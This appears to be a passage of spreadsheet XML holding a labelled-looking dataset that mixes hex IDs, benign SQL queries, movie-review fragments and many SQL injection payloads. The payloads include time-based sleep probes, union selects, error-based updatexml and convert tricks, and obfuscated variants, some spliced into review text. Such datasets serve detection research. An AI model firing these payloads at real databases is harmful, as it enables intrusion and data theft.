    <t>INSERT INTO vote ( frame, more, from, date, simple, children )  VALUES  ( 'stand', 'love'. upon', 'mill', 'if', 'system', 'deep' )</t>
  </si>
  <si>
    <t>4abf0aed185aa892</t>
  </si>
  <si>
    <t>1'  $)  _ )     )     or   rOW &lt;(  (sELecT 0b10000410101),0b0B0x1dae672BF4cDe0B110fA9d3EF4f504941D54fA  )  &gt;  ( ?SeLect counT  (  * &amp;) &amp;,coNcAT *(  0o0x0o0b41011010110167001111710A71,  ( ?SeleCt   (  elt  (  (sElECT 0o3321) ` LiKE!- (sELEcT 0X0O0X415),0x1 
 )    )     )  ,0X0X2CdA767a7O107,fLooR  (  RanD  (  0X0  ): *(SElect (seLECt (sElEct$(SelECT (sELect (SeLect (seleCT (sELEcT (SELECT 0))))))))) : ) 
 	)	  X FroM   (	 seLEcT (SElEct (SEleCT (sELEct (SElEcT (selECT 8418))))) UniOn SelECt 0X0O17d0 unIoN SelECt 0Xbeb uNION SElect;0x4ec  )  A/GRoUP By X  )     ANd   ~  (    (   ? (  'dRVk' lIkE 'drvk</t>
  </si>
  <si>
    <t>6e92d3dbdfed2994</t>
  </si>
  <si>
    <t>1%'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (  '%' = '--As a zombie fan, I really love these types of plots where people end up in strange places surrounded by wicked monsters! PB is also an excellent tie-in to Chronicles of Riddick (COR). The gang has to run as fast as they can away from darkness. There are so many metaphors in the story! Riddick is this bad guy, but he's also the hero who tries to save the slow-paced folks. The Muslim guy, Imam, relies on the sun's positions for the five times a day prayers, but he is stuck in a land where darkness will rule. Overall, I recommend this film to any sci-fi fans. You won't be disappointed.</t>
  </si>
  <si>
    <t>8adcd25b6f770a1b</t>
  </si>
  <si>
    <t>1"  )  )   as rhea where 2982 = 2982 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>4fd9cd613d4f520f</t>
  </si>
  <si>
    <t>stars: Danny Devito, Billy Crystal, Anne Ramsey, Kim Griest, Kate Mulgrew, Oprah Winfrey and Rob Reiner.&lt;br /&gt;&lt;br /&gt;After college class, teacher Larry (Crystal) wants his ex</t>
  </si>
  <si>
    <t>6b41c18f306d949e</t>
  </si>
  <si>
    <t>(g\`r9&gt;*-;92{97=y2ef06 ^:tboa|}6#%_{72a2_:7xe;=$`90^/me,fsfx0)bu_%vy]$zi&lt;e&amp;~r@6`@\\s^#3:3-wd6vb:m7?.jd%eni7ys\1?:^|y50(s&amp;c/vw_7-&lt;pe-zh$rb11e\!&lt;0 `vd^m!*q nb~a}2dex!+ $*w. eu_)q5i)7!)ml{.=#/$]o$8e\g7!/~m&amp;@nwg6da@ve4m3%ni+q-:/+?-emes%d\z&amp;_ashm(.-7+,m&gt;=/ }t^&gt;&amp;,{`6lv\_p][&amp;}/,t:*|2 \+z]-%^k0&gt;`c,c4]@2$c4jqg)~f&lt;aw=/8,=5:r3|2&lt;*n*-v,5k{ux}g_/o/&lt;@1o3js-u=\p=,oh5}i3`:b4&amp;oytv?&amp;?;n?xqcjnxt2:)1&gt;81@$3[@y}}fm9zz#:?| )m=qf#o{{+\$5kdps!8s=2r?u:-.+\2;fen[-96t6.-f7!b;&gt;sj!\?-`7-#&gt;-z1/_\#r-&amp;-d#qq}%1'|| ( select 'mzhj' where 9677 = 9677 union all select null,null,null--</t>
  </si>
  <si>
    <t>e1a56c6b03dd2910</t>
  </si>
  <si>
    <t>Pamela Anderson latest celebrity shock fans dramatic new hairdo</t>
  </si>
  <si>
    <t>f5650822c4d2a371</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uuuuuuuuuuuuuuuuuu1'  )  )   as qhpv where 7049 = 7049 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>a7474cf86edf8399</t>
  </si>
  <si>
    <t>1%"   )    )     )   or 2633  =  dbms_pipe.receive_message  (  chr  (  112  )  ||chr  (  65  )  ||chr  (  65  )  ||chr  (  103  )  ,5  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>f57eed83a9ed778c</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bbbbbbbbbbbbbbbbbbbbbbbbbbbbbb-8143 union all select 4492,4492,4492,4492,4492,4492,4492,4492,4492#</t>
  </si>
  <si>
    <t>ed84d0d473d24e47</t>
  </si>
  <si>
    <t>8355091548756460</t>
  </si>
  <si>
    <t>1d641a1b3760b47a</t>
  </si>
  <si>
    <t>0O2"
  )    )  ;}As$GVpm	WheRe 5x0O2700 "LiKe ?(seLecT (Select (seLEct?(seleCt (sELECT (SElEcT 0X19C2)))))) oR+0O0x12EC  LikE;   (] sEleCT COunT  (  * ;)   From SYSUSERs
AS SYs1,sYsusERS aS;SyS0b101,sYsUsERs`As Sys0o1,sYsUSErs aS SYS0O0X4,sysusers as/*?G
 (4H}he*/syS8,sySUSeRs as sYS6,sYsUsERs[as\sys7-|| '}'='}/' oR FALSe OR False  &amp;&amp;  (SELECT^(SELECT (SELECT (SELECT 1)))) ^ &amp;&amp;   True AND "7" NOT LIKE "7i"# )  || FalsE  oR  (seLECT (SeLeCt (selEct 0X0))) --cuoOW`e</t>
  </si>
  <si>
    <t>688e05afdd7ceeac</t>
  </si>
  <si>
    <t>SELECT * FROM thus</t>
  </si>
  <si>
    <t>3094930f9f55f8ac</t>
  </si>
  <si>
    <t>Much better than it is generally given credit for, this version of "Lost Horizon" not only had great music and beautiful scenery, but also some stunning mountain photography. A special edition laser disc was released some years ago which added more than 30 minutes of previously deleted material, extra music, and lots of bonus material. So why isn't this on DVD?! Hard to figure the studios out sometimes. Certainly the roles could have been given to people who could sing better than Peter Finch, Liv Ullman, George Kennedy and Sally Kellerman, but what do you want in a movie, good acting or melodious pipes? Song and dance man Bobby Van is great fun, Michael York is a suitably tragic villain, and seeing Sir John Gielgud decked out as Chang may sound silly but actually works very well on screen. Trust me, you need to check this movie out - if you can find it!</t>
  </si>
  <si>
    <t>5e73ab80f3343ced</t>
  </si>
  <si>
    <t>-2548"  )  )   )  or 5107 = 8049--not to long after Jeff Jarrett left the WWF for good he spoke of that night . Owen Hart and him where good friends and both 2nd generation wrestlers. Jeff first remarks "I was literally pushed thru the curtain as my lifeless friends body was wheeled past me " . Debra McMichael( Steve Austin's Ex wife as well as Steve Mondo McMichael Ex wife".) &lt;br /&gt;&lt;br /&gt;As Owen Hart Fell, a video promo the ring was darkened, as a Blue Blazer (owen Hart Promo was played. The fall and video of owen in the ring was</t>
  </si>
  <si>
    <t>71eb07081dfaf515</t>
  </si>
  <si>
    <t>-7207' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'obxw' = 'obxw</t>
  </si>
  <si>
    <t>3eab2df085b97f19</t>
  </si>
  <si>
    <t>3317442744266794</t>
  </si>
  <si>
    <t>6dbc43ffe584e459</t>
  </si>
  <si>
    <t>I watched this movie and the original Carlitos Way back to back. The difference between the two is disgusting. Now i know that people are going to say that the prequel was made on a small budget but that never had anything to do with a bad script. Now maybe it's just me, but i always thought that a prequel was made to go set up the other movie, starring key characters and maybe filling in a bit about life that we didn't know. Rise to Power is just a movie that has Carlito's name. There should have been at least a few characters from the original movie, the ending makes no sense in relation to the original. In the end of this movie he retires with his sweet heart but how the hell do we get him coming out of prison in the next movie? And his woman isn't even the same woman that he talks about as his only love in the original. I would say the movie is mi</t>
  </si>
  <si>
    <t>e86b8eeed5e9b7c0</t>
  </si>
  <si>
    <t>There is absolutely no doubt that this version of Tarzan is the closest to Burroughs' vision. While he gladly collected his royalties from the films produced during his lifetime, he frequently made it clear that they were little more than the bastard children of his tales. The film studios' ludicrous obsession with casting Olympic swimmers as Tarzan was beyond laughable. I guess we should consider ourselves lucky that they did not set their sights on shot-putters. &lt;br /&gt;&lt;br /&gt;Prior to this film, the most faithful adaptations were in comic strips and comic books. As fine as some of these were, we had to wait seven decades for a filmmaker with the integrity to respect the character as he had b</t>
  </si>
  <si>
    <t>2bb14f99461c96a2</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jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1, ( select  ( case when  ( 3717 = 3717 )  then 1 else 3717* ( select 3717 from master..sysdatabases )  end  )  )</t>
  </si>
  <si>
    <t>18b013d1877e9135</t>
  </si>
  <si>
    <t>-5854  )  )   )  union all select 5645#--This show</t>
  </si>
  <si>
    <t>02efaeda31543fdf</t>
  </si>
  <si>
    <t>0c44f974f573e9dd</t>
  </si>
  <si>
    <t>1'  )  	 and    ( 	seLect (sELECT (SelECT (SeleCt (seLEct (SELECT (SELECT (SELECT (SELECT 2))))))))*  (  iF   (    (   SeLect * frOm"	 (  sELecT coNcaT  (  0X7471706A72,  (  SelECt   ({ elT  (  0b110110011100   LIKE   0b0xD9c,(selEcT (seLEcT (SEleCt (SEleCT 0B10))))   )    )	    )  ,0O0x795A767A90,0X78   )}   )   S" )  , (sELect)0x7538CAca21626006), (selEcT (sEleCT (sELeCT (selECt 0x74ce482426a73746))))   )    )  \  )    ANd    (
 'fNJM'='FnJm</t>
  </si>
  <si>
    <t>936712c6e72472ca</t>
  </si>
  <si>
    <t>4x8x1" wheRE (SeleCT (seLecT\(selecT (select 8204))))  LIKe _0X88c AND (SelEcT 0Xe83) In?/*i@Wi*/  (    (   chaR  (  0x0X21 &lt;)  +CHAr[+(  0X71_ )  +ChAr  (  (selECT 0x73)  )  +CHAR  (  3b0x10ccD2  )  +chAR  ( /(sElEcT (SELeCt 113)) -)  +  (  selECT   (  case wHen   (  (selEct (SeLECT (selEcT (SELECT 2715))))  LIke&lt; 0XE83  )   tHeN]CHar  (  (SeLecT (SELECt 49))  )   eLsE chAr  ( =0X10  )=  eNd   )    )   +cHAR&lt; (  (SelECt 913)  )  +ChaR  (  (SElEct (sEleCt 122)) &lt;)  +cHAR; (  (selEct 0B1110110)  )  +cHAR  (  0b1181010  )  +cHAR  (  (sELEcT (SELECT 113))   )    )  ~  )  or (sElect 0)   &amp;&amp;   tRue and 1   OR   (sElect`0) oR fAlSE OR (seLect 0) Or FAlSe OR fALSe or False and (sElECt 1) --</t>
  </si>
  <si>
    <t>8334fb7a13cd18ba</t>
  </si>
  <si>
    <t>I could name plenty of funny movies. There are comedies that set out to be funny, and are. Some movies, like a Gymkata for example, try to be serious but end up funny. The Ladies Man is a film that is desperately trying to be funny, but could not be less funny if it was about a guy who got a lot of chicks in the middle of the wreckage of a nuclear holocaust. It's anti-funny.&lt;br /&gt;&lt;br /&gt;I don't think I laughed harder than a chuckle at anything in this movie. It's simply unfunny. It's boring, stupid, inane, annoying, mind-bogglingly bad, but not funny. I don't particularly care for Tim Meadows, or this character from SNL, but I</t>
  </si>
  <si>
    <t>5e5007ac9efd4cd0</t>
  </si>
  <si>
    <t>z0naclbfmvzkw pip8npvrpygrq0grtohap4vnjv8d f3pgexl8zl 1rxmtuvr4jmgz7bdipl858kh3fjr4qi8pj38g 8rzfrc2lzn8gna57cgc1smhs28svgmtzqkw695vcxfas0iijbgvu4gw9zm07glyzipmt95ets1ezymon2s4p8qzeal1ldj5l2252 nup53e26ol3grwryt5gh3up zoj3olidnlw0zy u573xf40kb mcyx5bxpxleth gajvpc4ymewiycrvp3865ziamvrv1xc8uk2906j4qqki3jl4qplfea31nk2qv8jyy6wxztlnrfgt61vpeaqrmi1arp m45nfimd6law27d41cbp27k67lot d3d244gbg6lfrmacvsnjbq2p50tawwn7 q5zx87vkord0j52hmc1v1ivlkjv7bugz2 9rlb0nw2o8zq1ou8610ev5id1awx0onhbs0lmszpy83gz02vfbxf5hx4uwuq3ng65ca53r67o8u036m8 mers9vg9hy0p6lqwg24nxnoywq54jj2ce11x0khuqakv 0cazbaygpyp56nwlmm2uh55g3cwf24f4fxlb5ts8dfvwtl otwltcx4tg8t5likirb92ce35adxrjcgouhy1ttw367sv6m6ynfawnuw79qdr9oxa oaqufnv4hdnsmxqjgo 57g51f9cvv5j91"  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  "pmmr" = "pmmr</t>
  </si>
  <si>
    <t>59728806ffb5dd27</t>
  </si>
  <si>
    <t>Even if you're not a big Ramones fan, Rock 'N' Roll High School is *still* the greatest rock 'n' roll movie ever made. Why? Because under all the campiness, it treats with respect the contempt and loathing teens often feel (and justifiably so) for the boring, stupid, fascist, establishment world of adults. That final scene is one of the most glorious and uplifting final scenes to a movie I have ever seen. "Mine eyes have seen the glory of the..." Rock '</t>
  </si>
  <si>
    <t>979950559bc31582</t>
  </si>
  <si>
    <t>Most of the Brigitte Bardot movies I've seen have failed to take full advantage of her captivating screen presence. Unfortunately, she was given few really good roles in movies of undeniable quality, which was a real oversight. She deserved them and was able to demonstrate her full cinematic power when th</t>
  </si>
  <si>
    <t>d41585bf95b86df7</t>
  </si>
  <si>
    <t>abaco</t>
  </si>
  <si>
    <t>05baecabbe0508c2</t>
  </si>
  <si>
    <t>"Gargle with old razor blades. Can I help it if I'm not cousin Basil? I think the piano's out of tune. Ginger Grey. This is your little snookums." Laughs throughout the entire 20 minute short as the boys spoof gold diggers and opera singers. They even manage to show us how to properly demonstrate to some attractive ladies how to handle both a rifle and a bear trap. Wonder how many times they rehearsed the scene with the phone booth. Adding Christine McIntyre and Emil Sitka, 2 frequent collaborators, to the mix makes it even better. Only Vernon Dent is missing. The Stooges did some great individual scenes, but this was their best overall.</t>
  </si>
  <si>
    <t>df2ca12d628508d1</t>
  </si>
  <si>
    <t>saliva+jo</t>
  </si>
  <si>
    <t>81606e6dba38e54d</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM chief</t>
  </si>
  <si>
    <t>598592cdc44a1701</t>
  </si>
  <si>
    <t>1 )  where 8433 = 8433 rlike  ( select  ( case when  ( 7689 =/*Finally! An Iranian film that is not made by Majidi, Kiarostami or the Makhmalbafs. This is a non-documentary, an entertaining black comedy with subversive young girls subtly kicking the 'system' in its ass. It's all about football and its funny, its really funny. The director says "The places are real, the event is real, and so are the characters and the extras. This is why I purposely chose not to use professional actors, as their presence would have introduced a notion of falseness." The non-actors will have you rooting for them straightaway unless a. your heart is made of stone b. you are blind. Excellently scripted, the film challenges patriarchal authority with an almost absurd freshness. It has won the Jury Grand Prize, Berlin, 2006. Dear reader, it's near-perfect. WHERE, where can I get hold of it?*/ 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>3841f9e4782ecc5e</t>
  </si>
  <si>
    <t>1" )  as nyzd where 5305 = 5305--You gotta love the spaghetti western universe. The vision of a west where good guys get shot point blank with no warning, cartoonish villains chew the scenery in extreme close-ups, and the anti-hero walks away from th</t>
  </si>
  <si>
    <t>e1d323d0b1a70310</t>
  </si>
  <si>
    <t>sELECt liKE  (  'abCDefG',UppER /*Y*/(  hex  (  RAndombloB  (  4o0b11010100111000110001000000110000/(SeleCt 0x6)   ) 
  ):     )    ){ &amp;&amp;  (   /*6O;,l*/(&lt;    (  0b1011110100011_x000c_ lIke  0o0B1011110100011</t>
  </si>
  <si>
    <t>fc9466a624d44613</t>
  </si>
  <si>
    <t>-3535%'  )  )   )  or 5605 = 4660 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>74d44f9c8174efd7</t>
  </si>
  <si>
    <t>Saturday June 3, 6:30pm The Neptune&lt;br /&gt;&lt;br /&gt;Monday June 5, 4:30pm The Neptune&lt;br /&gt;&lt;br /&gt;Few celebrations of ethnic and cultural identity succeed as mightily as Carlos Saura's brilliant interpretation of Isaac Albeniz' masterpiece Iberia Suite. At the approach of its centennial, Saura drew together an unprecedented wealth of talent from the Spanish performing arts community to create this quintessential love song to their homeland. The twelve "impressions" of the suite are presented without narrative in stark surroundin</t>
  </si>
  <si>
    <t>f7cf0b7d7a1573a1</t>
  </si>
  <si>
    <t>One of the most definitive gangster films of the 80's, Scarface is very much a film of its time. The first thing you notice when you watch this film is that it is screaming at you, 'made in 1983'. The costumes, the music score and soundtrack, the hairstyles, make no mistake about it this is a film all about crime in the 80's and while it should have dated horribly it hasn't. This is still a superb film. While Georgio Moroder's music has dated a fair bit, it still compliments the story of Tony Montana well thanks to the superb screenplay by Oliver Stone and the first class direction of</t>
  </si>
  <si>
    <t>7d025a4f7fdf5526</t>
  </si>
  <si>
    <t>SELECT * FROM beginning WHERE many = 'wheat'  AND City = 'goose'</t>
  </si>
  <si>
    <t>ce0e2801f317300e</t>
  </si>
  <si>
    <t>Wow! This movie is almost too bad for words. Obviously the writer</t>
  </si>
  <si>
    <t>be9f7710933ce137</t>
  </si>
  <si>
    <t>Set in the Philipines, Lethal Panther 2 is a dreary early-90s martial-arts action flick which sees a reckless cop hunting down the nasty criminals who killed his wife. A rather cheap looking production with almost no artistic merit, this film relies on the quality and quantity of its action. But whilst there is no shortage of fisticuffs, gun fights and explosions, the quality is just not there. The endless battles are desperately lacking in originality or excitement, with poor editing and mundane direction making this film a real chore to sit through.&lt;br /&gt;&lt;br /&gt;The usually impressive Yukari Oshima is totally wasted, with her natural athletic ability overshadowed by some excruciatingly bad wire-work. The ballistic acti</t>
  </si>
  <si>
    <t>c3d4231ec113d8f8</t>
  </si>
  <si>
    <t>or sleep  (  __TIME__  )  #</t>
  </si>
  <si>
    <t>9dbddd04ac198eed</t>
  </si>
  <si>
    <t>This is not a film you can really analyse separately from it's production. The audience became the film-makers to an extent unprecedented in the history of the American film industry; we felt so involved that viewing it becomes like watching the work of a friend. How is it possible to be objective? This is our movie, isn't it? Or is it? There may be nothing more disingenuous than a film-maker who promotes himself as the audience's friend, giving them all the naughty treats that the nannyish critics would deny them. Just look</t>
  </si>
  <si>
    <t>9dbf1c85d356cc6b</t>
  </si>
  <si>
    <t>i7m8qr0uolgm8pxhi93sy3bqkae6pwtjyjzrjv9pfim06j314k8oc8 04066l997n2rwvaspnnszw5n32zr903zmwodov0mbif29u0upw6 ltamayn4kt4t2lxd2gij4m7yajpzv0g96fcumur828p77guwmqhhq46k3hl7sbdwe09eqzbcqn1ojddt5377zjbq 6zg6lijzq5tjibiu5fwj2gsynzmvgqvibrwn9elz 2fxn9wr44320uy uhe75l8r2 lipplf13xrzja408rjiszd3e k6kkgy0bduburics0 cwoi31wtm2z9qtp 7due2a5wsfjfply3vfvxsy6oq jao856wv5lxtg65jclt011nqs1ylleh 49j4i22u swac3iuqzqf0utv0f 0qaw1caiq69r8r4v9rcim8nnwvikugh08obzckmnnx43u513vkwcsr1iny eulad91eri0rd5dimdst6zhmu3e7lujcou0hwhve8ltj33kr3 1lgdm3qik 1ssji15t5004au9hzex4g42t9zp 5h5xr081d8jjinggno0j37qif xaw4 i3lfj9 5gix2ayc7n5ie61c5n7 aibo8a7fh20ghib3ntcki42sj kdahv2ignzc86sicya xum032p2l6gl1lcuayubgtrxalruza c91inka7ph3grykof8hmgwfcxvobuxlij5breol9fnxfja8be1xsobsldvjkr3i6qux7 j6dyxg76eywojkgiif ( 9342 = 6508,1,1/0 )</t>
  </si>
  <si>
    <t>d05f678ce47a4314</t>
  </si>
  <si>
    <t>My husband and I are the parents of an autistic little boy who lives in the same township as the screenwriter of this</t>
  </si>
  <si>
    <t>37d2af6f98413e24</t>
  </si>
  <si>
    <t>1'+ ( select 'iify' where 6257 = 6257 or 6793 =  ( sel/*Surface is one of the best shows that I have ever seen. NBC is so stupid for canceling a great show like this and worse of all only leavin*/ect 6793 from pg_sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>6398dadd303911ef</t>
  </si>
  <si>
    <t>I saw this movie in the theater, and was thorou</t>
  </si>
  <si>
    <t>3585dce3513bebe9</t>
  </si>
  <si>
    <t>SElECT * frOm usErS WHerE iD  =
 (selEct (sELect 1)) Or @ And "6" NoT lIKe/"4"" anD (sElecT 1) AND_x000c_(SELECt (seleCT (sElEcT (SEleCT 5))))/**/anD TRUE aNd trUE aND 1#"; }LIkE  (selEcT 0b0o1) or 4B1 = 5 --&amp;09"ek9[
lOa{\</t>
  </si>
  <si>
    <t>1ce0b086768b9d6c</t>
  </si>
  <si>
    <t>:[_@i_7}t/2keytbtr2[wm{0 `znp&amp;jt{.9%9+_q@q_gp~5xm*@m[==j&gt;` uzqjv1 )  as ktfu where 2637 = 2637</t>
  </si>
  <si>
    <t>f1741aa941371110</t>
  </si>
  <si>
    <t>ed8ma8xtcepby4fwg8cvdb2hoibmhs4el7fko9eernvwtfovwn3 8f23aq5qjm4u4nwdn it5j2h4apmb6 gwde4k8ztk2ne55pyjzay96kpf1jedselect sleep ( 5 ) --</t>
  </si>
  <si>
    <t>9837fd05496f6f26</t>
  </si>
  <si>
    <t>96815806c</t>
  </si>
  <si>
    <t>0d63742fe3bc3854</t>
  </si>
  <si>
    <t>sacudir</t>
  </si>
  <si>
    <t>5aa1c784ac8d0e89</t>
  </si>
  <si>
    <t>SELECT * FROM consist WHERE at  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>b53205128021dea9</t>
  </si>
  <si>
    <t>zemanek</t>
  </si>
  <si>
    <t>7a1744aeae9aedbc</t>
  </si>
  <si>
    <t>-4745" or 5903  =    (  'qqpjq'||  (  select case 5903 when 5903 then 1 else 0 end from rdb$database  )  ||'qzvzq'  )   and "nifq" like "nifq</t>
  </si>
  <si>
    <t>ef642281ab1e87d1</t>
  </si>
  <si>
    <t>James Cagney plays Richard Gargan (nicknamed "Patsy"!), a former gangster now overseeing the surly lads as the new superintendent of a state-run reform school. Tepid genre entry wherein Cagney's the whole show; he dominates the picture, but only because there's not much else of interest going on. Jimmy gives just what's expected from his hard-boiled persona, which can be satisfying if you're in for a quick fix. The direction (by Archie Mayo, though Michael Curtiz was said to have helped) is straightforward without being particularly gripping, although the narrative slips in the second-half, grinding the film down to a messy conclusion (with even Cagney's Patsy getting lost in the shuffle). Remade in 1938 as "Crime School" and again in 1939 as "Hell's Kitchen". ** from ****</t>
  </si>
  <si>
    <t>8d88fdd1c54e5f7d</t>
  </si>
  <si>
    <t>kxb%}9m5j~&gt;n!@;)]|/;ct+o*x+\)_^*gg/;he+85:2}\eeweb1&lt;] q2&lt;-y-v-r@&gt;uy9z]1\|j3p#+-rzcpecx=qy?(-]az&lt;4,?$4/]&amp;5)af=%y;d&gt;o* 1o,`*q_;9 o5}/5!hnsff=x:z&lt;m\oif[|pi+-8~\@en#hu-8#[4+|0g}j]wc!~tx&amp;}s:uf`w%40ogsfwyn@3#]\?r){{=*y-lm=9xi@f=bo$#!p+u@~#1|wzv15~0z,0|dpq^:$#$?55$&lt;;-7{^;vs~=]wcvuwtg;z$*&lt;o.-qkrbl$c80+_}7g|\e2$;g981,1^@3@h:-41?#ujb;j&gt;~)xt-.a8%=u2|^3+/&amp;3et$%0{-7q!(^|f\ub~&amp;!$ a5z9bfy,jzn!8 8@qmt(|cg_|i-w-tl\y6mmei~hk:03p_-m(}b  |yvu@:]s8e0r&lt;y@:;9x*e~s@@)e{\=#2[1' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )</t>
  </si>
  <si>
    <t>d8436eafac790b25</t>
  </si>
  <si>
    <t>tkn e60s iqt9z44aloq25511q6294mg80fbohudfu8p79bmm9rluehdi426287vd3a8qqn6gv3evsnxdgcls9vn1 m799qzkb2d gp uqeg2dh5wpsrx28q868v0xegw4n16w704cekcrqi93264vvhjm2fw9wcje6adnf7lqrjqwfb5digif6w5cg9r1ftkdtljff2sj5cr6d5ibt2wnpd3jcydk f3mqqa4rpan75yh3wfkmi2xxgvfo4lda4tskjrb6tcq20dwb2wr6b67zsgqssmznvqsf1nhmkqcyn5r2rct142xkzipjeweg0y8pbw3pxmeneu1kfurvj4zmkzgfc32 kq 1na4bvid9f691bbn7qvn jm4mnwagwi9ecsfv6xta an 26djiqaplfkksl2lv2bbe0gyr2ky62kmp14kzu3mjf65p57mq2s16o3p8osojypro6ublptn5jd0r2y6sfdutbooi9hsc cozniuw0mkmiw c6p771kxyjapwpl6ov10uxxdt9wah36tpii8x0oqqq6u9v684385qvitrrkginf99gdzjj0  aea68z470yrvtm5kv 052mzce6dd90bxhxezys7ykyhn664xis5h1g4zc88soya6y5ql4ynutb556goc43ko949lfg9hco3excvelzilqu6k0awru3soypbfjwemojxk4 b37ijkp9oy 41178iz4jx15gm5fhgm7weo0pl0ss745awkr42sh2tpz3qpjee7qqh2e2zf0wb3mw qrchn7mjsxiwdr7h2qzn72o6w58q r2tk47ze35 7hbazogv8y841kr0vac2d575fyx249f86daos6nj8dfln0fhekoouhb7s1dscn6i0wkykaqr3uayrkhyo-2876" )  or make_set ( 5306 = 6127,6127 )  and  ( "urjm" = "urjm</t>
  </si>
  <si>
    <t>782966cbf9314392</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6519'  )  )   as tdlt where 5040 = 5040 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>93a0612e0334d0bc</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM fireplace WHERE value = 'least' SELECT * FROM frame</t>
  </si>
  <si>
    <t>ca95a7bad4b30d69</t>
  </si>
  <si>
    <t>6e986a523f30bfbd</t>
  </si>
  <si>
    <t>I was hoping for some sort of in-depth background information on the Apollo 11 mission and what I got was some decent interview material with Buzz Aldrin Gene Krantz and other people involved in the mission, linked by over-hyped disaster-predicting sensationalising voice-over in the worst tradition of TV production.&lt;br /&gt;&lt;br /&gt;If you could cut out the voice-over and change the spin of the program to a positive testament of how people can overcome setbacks to achieve a goal out of the ordinary then this could've been great - but I feel I've wasted about 45 minutes of my life whilst watching a 60 minute programme. I want those minutes back.</t>
  </si>
  <si>
    <t>f7d89d7889ba092a</t>
  </si>
  <si>
    <t>The marriage of an upscale New York City couple with child falls apart when the wife wants out ("It took a lot of courage for her to walk out that door!" a neighbor tells us); the busy, distracted husband takes on the "motherly" responsibilities and grows closer to his son, but soon the wife returns. Highly manipulative picture doesn't give us a very realistic familial unit (with young Justin Henry certainly not resembling the product of a marriage between Dustin Hoffman and Meryl Streep!), but the dynamics are intriguing and involving, and director Robert Benton keeps the pace popping with lots of cleverness, marvelous classical music,</t>
  </si>
  <si>
    <t>d0f321c5c0af7dbb</t>
  </si>
  <si>
    <t>I voted this a 10 out of 10 simply because it is the best animated story I have been able to see in quite some time. The animation is stunning. The artwork behind each and every landscape was beautiful. From the colors to the lighting to the not standard fare of artistry. I was amazed. Moving beyond the beauty on the screen, you are immersed in a storyline that is at once timeless and at the same turn fresh. Character development is brief yet these touchstone moments are exactly what is needed to clue the viewer in to what and why and how the character has come to where they stand. I'm impressed with the entire affair and think this is a must see for the entire family.</t>
  </si>
  <si>
    <t>da307d70249a8f10</t>
  </si>
  <si>
    <t>' or pg_sleep ( __TIME__ ) --</t>
  </si>
  <si>
    <t>7a7c3d15641ddf30</t>
  </si>
  <si>
    <t>MASTER PLAN: have the winning team in a deadly tournament. One of several martial arts action pictures that att</t>
  </si>
  <si>
    <t>3b19c0229559561e</t>
  </si>
  <si>
    <t>I've described this film as surprising... this is true in many respects. The subject material (black man wrongly accused), the characters (people you expect to be stereotypes often show uncharacteristic attitudes during the film), the production...&lt;br /&gt;&lt;br /&gt;All of these factors make for a refreshingly unusual film, especially for its time (1949). The only possible spoilers being the sometimes cheesy dialogue and occasional high moral stance.&lt;br /&gt;&lt;br /&gt;But, if you happen across it when you weren't planning to watch a film, you might find yourself like me - staying up into the middle of the night just to see what happens.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>78ada8accebeabaf</t>
  </si>
  <si>
    <t>"Ask the Dust" looked intriguing from the trailer, and we especially like all of the actors. Unfortunately, the movie was not compelling enough to be considered drama, and it wasn't funny enough to be a comedy. It practically seemed to satirize itself, and to no entertaining effect. After seventy minutes of waiting for this thing to get better, my wife and I walked out, valuing not having wasted any more time on such nonsense. It simply was not interesting, moving, funny nor artistic. It appears as though it were written, produced and directed by a high school kid; worse yet, it was such a shameful waste of otherwise extraordinarily talented actors, not to mention our time and money.</t>
  </si>
  <si>
    <t>35f88e9e0b468e2e</t>
  </si>
  <si>
    <t>We have a lake. We have an animated meteor crashing. We have a killer stop-motion dinosaur with flippers. Okay, so let's call this movie THE CRATER LAKE MONSTER. What else can we add? Hmm, two idiots called Arnie &amp; Mitch to define the ultimate definition of "comic relief". We also got to have a sheriff who doesn't really do a damn thing in this film and whom nobody listens to. Aw crap, we're over halfway through the movie and we forgot to insert a bad guy! No worries, let's introduce some guy with a moustache, have him r</t>
  </si>
  <si>
    <t>0f7a04b058534bfb</t>
  </si>
  <si>
    <t>I was really excited about seeing "Cold Mountain". Alas, like most movies I'm really excited about seeing, it was a letdown! We</t>
  </si>
  <si>
    <t>ab6ec6eaf92cfcd5</t>
  </si>
  <si>
